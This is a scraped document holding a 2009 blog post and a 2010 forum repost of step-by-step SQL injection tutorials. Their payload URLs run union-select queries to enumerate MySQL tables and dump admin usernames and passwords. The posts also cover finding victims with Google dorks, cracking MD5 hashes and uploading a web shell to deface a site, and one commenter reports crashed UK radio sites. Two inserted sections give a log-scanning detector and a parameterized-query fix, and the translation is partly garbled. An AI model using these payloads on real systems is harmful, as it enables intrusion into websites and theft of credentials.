if but will step-by-step sql injection sql injection hack hack how easy admin

Upload: dodopowo

Post on 30-May-2018


  • 8/9/2019 If but Will Step-By-step SQL Injection SQL Injection Hack Hack How Easy Admin

    1/29

    My Step by Step SQL Injection

    Posted by Admin on February 15, 2009 - 6:00 pm


    Understanding sql injection:

    SQL injection is a hacking action performed from the client application by modifying an existing SQL statement in the client application's memory; it is also a technique for exploiting web applications that use a database to store their data.

    What you need to know before MySQL SQL injection:

    characters: ' or -

    comments: /* or --

    information_schema: for MySQL version 5.x; MySQL version 4.x does not support it

    ===========

    = Step A: =

    ===========

    Find the target

    e.g.: [site]/berita.php?id=100

    Add the character ' at the end of the URL, or add the character "-", to see whether an error message appears.

    example: [site]/berita.php?id=100' or

    [site]/berita.php?id=-100

    so that an error message appears, as follows (there are many more):


    ==========

    = Step two: =

    ==========

    Find and count the number of tables that exist in the database ...

    use the command: order by

    example: [site]/berita.php?id=-100 order by 1-- or

    [site]/berita.php?id=-100 order by 1/*

    check every step (one by one) ...

    e.g.: [site]/berita.php?id=-100 order by 1--

    [site]/berita.php?id=-100 order by 2--

    [site]/berita.php?id=-100 order by 3--

    [site]/berita.php?id=-100 order by 4--

    until an error appears or the error message disappears ...

    e.g.: [site]/berita.php?id=-100 order by 9--

    means that the number we take is up to 8

    i.e. [site]/berita.php?id=-100 order by 8--

    ===========

    = Step three: =

    ===========


    To find out which numbers appear, use the union command.

    Because the error occurred at number 9,

    then: [site]/berita.php?id=-100 union select 1,2,3,4,5,6,7,8--

    OK, suppose the number that comes out is 5.

    Use the command version() or @@version to check the version of SQL in use, entering the command at the number that came out earlier.

    e.g.: [site]/berita.php?id=-100 union select 1,2,3,4,version(),6,7,8-- or

    [site]/berita.php?id=-100 union select 1,2,3,4,@@version,6,7,8--


    Look at the version in use. If it is version 4, leave it alone, because in version 4 we have to guess the table and column names on the web ourselves, since the command from information_schema cannot be used.

    If it is version 5, you are lucky and do not have to guess the table and column names as in version 4, because version 5 can use the command from information_schema.

    ============

    = Step Four: =

    ============


    To display the tables that exist on the web:

    the command table_name >>> is entered at the number that came out earlier

    the command from information_schema.tables/* >>> is inserted after the last number

    [site]/berita.php?id=-100 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables--

    Suppose the table that appears is "admin".

    ===========

    = Step Five: =

    ===========

    To display all of the tables:

    the command group_concat(table_name) >>> is entered at the number that came out earlier

    the command from information_schema.tables where table_schema=database() >>> is inserted after the last number

    [site]/berita.php?id=-100 union select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--

    =============

    = Step Six: =

    =============

    the command group_concat(column_name) >>> is entered at the number that came out earlier

    the command from information_schema.columns where table_name=0xhexa-- >>> is inserted after the last number

    [site]/berita.php?id=-100 union select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0xhexa--

    At this stage you must convert the table name to hexadecimal.

    Website used for the conversion:

    www.ascii-convert.co.cc

    For example, after conversion the word admin becomes 61646D696E

    [site]/berita.php?id=-100 union select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name=0x61646D696E--


    ============

    = Step-Seven: =

    ============

    To bring out the contents of what was found in the table:

    the command concat_ws(0x3a, the columns whose contents you want to bring out) >>> is entered at the number that came out earlier

    the command from (the name of the table found) >>> is inserted after the last number

    [site]/berita.php?id=-100 union select 1,2,3,4,concat_ws(0x3a, the contents of the columns),6,7,8 from (the name of the table found)--

    For example, the words that come out are id, username, password

    [site]/berita.php?id=-100 union select 1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8 from admin--

    ==============

    = Step-Eight: =

    ==============

    The last stage is to look for the admin or login page.

    What happens next is up to you, because the web is now in your hands ...

    For a clearer explanation, you can download the video tutorial file on MySQL injection.


    Direct your run file "Injection.html SQL"

    (Nb. apologize if there is one word or deficiencies in this video tutorial)

    Greeting

    Gonzhack
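
    The steps above leave a recognisable trail in a web server access log. The following is an added example, not part of the original post: a log scanner that decodes each query parameter and labels the stage of the walkthrough it matches. The log format, the sample lines, the stage labels and the assumption that `id` should be numeric are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Markers for the stages in the walkthrough, matched against the decoded parameter value.
STAGES = [
    ("order by probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version query", re.compile(r"@@version|\bversion\s*\(", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("concat function", re.compile(r"\b(?:group_concat|concat_ws)\s*\(", re.I)),
    ("hex literal", re.compile(r"\b0x[0-9a-f]{2,}", re.I)),
    ("trailing comment", re.compile(r"(?:--|/\*)\s*$")),
]
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3}')

def normalise(value):
    """Replace inline /*...*/ comments and whitespace runs with one space."""
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", value)).strip()

def classify(line):
    """Return (client, set of stage labels) for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    stages = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        text = normalise(value)  # parse_qsl has already decoded %xx and '+'
        if name in NUMERIC_PARAMS and not text.isdigit():
            stages.add("non-numeric " + name)
        stages.update(label for label, rx in STAGES if rx.search(text))
    return client, stages

def summarise(lines):
    """Group stages per client; several stages from one client suggest a walkthrough in progress."""
    seen = defaultdict(set)
    for line in lines:
        result = classify(line)
        if result and result[1]:
            seen[result[0]] |= result[1]
    return dict(seen)

# Constructed sample lines (documentation addresses, placeholder path from the page).
SAMPLE_LOG = [
    '198.51.100.20 - - [15/Feb/2009:18:00:00 +0000] "GET /berita.php?id=100 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Feb/2009:18:00:05 +0000] "GET /berita.php?id=100%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [15/Feb/2009:18:00:09 +0000] "GET /berita.php?id=-100+order+by+9-- HTTP/1.1" 500 312',
    '203.0.113.7 - - [15/Feb/2009:18:00:20 +0000] "GET /berita.php?id=-100+union/**/select+1,2,3,4,version(),6,7,8-- HTTP/1.1" 200 5200',
    '203.0.113.7 - - [15/Feb/2009:18:00:31 +0000] "GET /berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables-- HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for client, stages in summarise(SAMPLE_LOG).items():
        print(client, sorted(stages))
```

    The "non-numeric id" label fires on the very first probe (the stray quote), before any SQL keyword is sent, which makes it the earliest signal of the set.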


    13 Comments

    1.

    LinKL says:

    March 29, 2009 at 4:03 pm

    On the website my goal ..

    Ga there recordID = ....

    of disposable

    cat 21:22

    cat 22:23


    was how mas?

    2.

    Andyra says:

    May 7, 2009 at 6:31 pm

    om .. why I can not in step 3 yes

    whereas step 1 ma 2 can but how can a three-_-y

    om said in step 3 would be in the numbers ni?? Indeed figures out that important

    Tw jangan2 ntu tu om hehehe toggle rate

    om joke ...

    Plis dong om .. kluenya again ..

    3.

    Patara says:

    May 16, 2009 at 10:29 pm

    Hi guys,

    You managed to crash a few radio stations in the UK on Friday and have very kindly pointed out how you did it via this blog. Strangely enough I am not upset, because they are not mine!

    However, what it shows me is that you are very good at breaking through what UK techies think is a safe website. I therefore would like to employ you in a consultancy capacity to let me know how safe certain sites are as we develop them. By this I mean that you are to charge me a consultancy fee per site to let me know the weak points in any site that I send to you - however NOT to crash it :)

    I understand if you are cautious about Standard and Poor's approach, but want to leave you with a thought: You guys are very smart - much smarter than my techies in the UK - who will be up and running again at some point, however I would like to put the knowledge you have to good use and I always pay someone who teaches me something. When I was younger I studied martial arts and was taught that if someone punches you in the face, it is because you have a weak guard, so you should respect that anyone can get through your guard and not make excuses for your own weakness (in letting the punches get through) well your punches got through and you have my respect :)

    Hence I am willing to pay you to teach me how to stop others getting past our guard.

    Regards

    Patara

    4.

    Gardening says:

    June 13, 2009 at 1:56 pm

    Hello Guru, what enticed you to post an article? This article was extremely interesting, especially since I was searching for thoughts on this subject last Thursday.

    5.

    Denny Garden says:

    June 13, 2009 at 4:37 pm

    Such a useful blog? Wow!!

    6.

    Lidia says:

    June 26, 2009 at 3:17 pm

    Mas, had long since learned to hack really want to, not purposely to see this website. Googling my

    own again hence the problem of mysql injection nyantron here. That's really great video, dial-up

    connection lemot internetku really, is there a smaller version of the pdf? Then there's a tutorial on

    writing that is lost or accidentally dilengkapin not ya? please can not ask for the full article? Thanks loh!

    7. share] step by step SQL injection just for the learning course


    Post Admin on Thu January 16, 2010 5:14 pm

    [Share] step by step SQL injection just for the learning course

    since here there is thread "hacking hacking trick-Share is ngetrend" in addition to strengthening my

    memory, I am very forgetful soale Wink)? / S7;

    I'll share my knowledge this is only a little about how to conduct SQL injection on the web ... (remember

    only for learning just ea ... Very Happy)

    ga ato useful if too vulgar in del aja .. (Dueh unnoticed if ane ordinary vulgar Very Happy)

    Before talking about SQL injection, first I'll explain what SQL injection is and how it can happen.

    Actually SQL injection occurs when an attacker can insert some SQL statements into a 'query' by manipulating the data input into the application. Among DB setups such as PHP + MySQL and ASP + MSACCESS or with MySQL, here I'm just going to discuss SQL injection in the URL only.

    sob immediately wrote ...

    1. looking at the first target with a dork mbah google "inurl: index.php? id =" (other dork can nyari on

    google, many bgt koq)

    2. suppose you already have the target http://www.korban.com/index.php?id=1

    Add a single quote character "'" (without quotation marks) at the end of the url

    or add the character "-" to see if there is a vuln.

    so the url becomes http://www.korban.com/index.php?id=1'

    if there are errors on the web page it means that the web is vuln, if not search for other targets ...

    3. locate and count the number of tables that exist in its database. use the command: +order+by+number

    so that the url becomes http://www.korban.com/index.php?id=1+order+by+1--

    now check one by one until no longer find the error:

    http://www.korban.com/index.php?id=1+order+by+1--


    http://www.korban.com/index.php?id=1+order+by+2--

    http://www.korban.com/index.php?id=1+order+by+3--

    http://www.korban.com/index.php?id=1+order+by+4--

    http://www.korban.com/index.php?id=1+order+by+4-- was not suppose to find the error again.

    mean that we take is to figure 3

    4. to find out which numbers appear, use the union command

    because of this error until the number 3

    then:

    http://www.korban.com/index.php?id=1+union+select+1,2,3--

    5. suppose the number that comes out is 2; use the command version() to check the version of SQL in use, entering the command at the number that came out earlier

    example:

    http://www.korban.com/index.php?id=1+union+select+1,version(),3--

    look at the version in use; if it is version 4, leave it alone, because in version 4 we have to guess the table and column names on the web ourselves, since the command from+information_schema cannot be used

    if it is version 5, you are lucky and do not have to guess the table and column names as in version 4, because version 5 can use the command from+information_schema. continue ...

    6. To display all the contents of the table: the command group_concat(table_name) -> is entered at the number that came out earlier

    the command +from+information_schema.tables+where+table_schema=database()-- -> is inserted after the last number

    so the url becomes http://www.korban.com/index.php?id=1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--

    7. suppose you have found the table that probably contains the username + password, namely the table "admin"

    first change the table name admin to hexadecimal form (you can do it here: http://www.string-functions.com/string-hex.aspx)

    8. enter the command group_concat(column_name) -> at the number that came out earlier

    enter the command +from+information_schema.columns+where+table_name=61646d696e-- -> after the last number; 61646d696e is the word admin in hex form

    so the url becomes http://www.korban.com/index.php?id=1+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x61646d696e--

    9. To bring out the contents of what was found in the table:

    the command group_concat(0x3a, the contents of the columns you want to bring out) -> is entered at the number that came out earlier

    the command +from+(the name of the table found) -> is inserted after the last number

    example: the words that come out are adminID, Name, password

    thus it becomes

    http://www.korban.com/index.php?id=1+union+select+1,group_concat(adminID,0x3a,Name,0x3a,password),3+from+admin--

    10. 've met tuh username password na ma ... na tuh stay dencrypt pass. if the form could be on crack

    md5 here http://www.md5decrypter.co.uk/

    11. search login page Admin -> Login as admin -> Search fitur2 uploaded files or images -> then upload

    your shell -> then whatever you want diapain tu web Very Happy. can be hell if directly PM tu web

    admin who'll soon have the patch (na e-mail can also search the table yesteryear), Jagan in eah coz

    deface web make it hard to sob ...

    12. cape dee huft writing that much ..., del aja ga if useful ....


    thx for the predecessors who have given science a cuma2 make ane ... Very Happy

    Admin

    Webmasters

    Webmasters

    Number of posts: 60

    Age: 24

    Location: Bandung

    points: 89

    Reputation: 0

    Registration date: 2008-09-12

    http://speechyourm1nd.blogspot.com/
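
    The post above explains that the injection happens when request input is inserted into the query text. The following is an added example, not code from the post or the forum: the vulnerable query construction beside two corrected forms, using Python's sqlite3 as a stand-in for the PHP + MySQL stack the post discusses. The table and column names follow the post's example; the rows, function names and input string are constructed.

```python
import sqlite3

def make_db():
    """Constructed sample data: a three-column news table and an admin table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE berita (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (adminID INTEGER PRIMARY KEY, Name TEXT, password TEXT);
        INSERT INTO berita VALUES (1, 'Hello', 'First article');
        INSERT INTO admin VALUES (1, 'root', 'constructed-hash-value');
    """)
    return db

QUERY = "SELECT id, title, body FROM berita WHERE id = "

def get_article_vulnerable(db, raw_id):
    # BEFORE: the request value becomes part of the SQL text and is parsed as SQL.
    return db.execute(QUERY + raw_id).fetchall()

def get_article_bound(db, raw_id):
    # AFTER, layer 1: a bound parameter is only ever a value, never SQL syntax.
    return db.execute(QUERY + "?", (raw_id,)).fetchall()

def get_article_safe(db, raw_id):
    # AFTER, layer 2: reject anything that is not a plain decimal integer, then bind.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a plain decimal integer")
    return db.execute(QUERY + "?", (int(raw_id),)).fetchall()

# Constructed input in the shape of the post's step 9, adapted to the sample tables.
PAYLOAD = "-1 union select adminID, Name, password from admin--"

def demo():
    """Run the same input through all three functions and return what each does with it."""
    db = make_db()
    leaked = get_article_vulnerable(db, PAYLOAD)  # rows from the admin table
    bound = get_article_bound(db, PAYLOAD)        # no rows: compared as one value
    try:
        get_article_safe(db, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, bound, rejected

if __name__ == "__main__":
    print(demo())
```

    Binding alone already stops the statement from being rewritten; the validation layer additionally turns the probe into an explicit error that can be logged.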


    Re: [share] step by step SQL injection just for the learning course

    Post engkoh on Fri January 31, 2010 4:52 pm

    nice info gan ..

    engkoh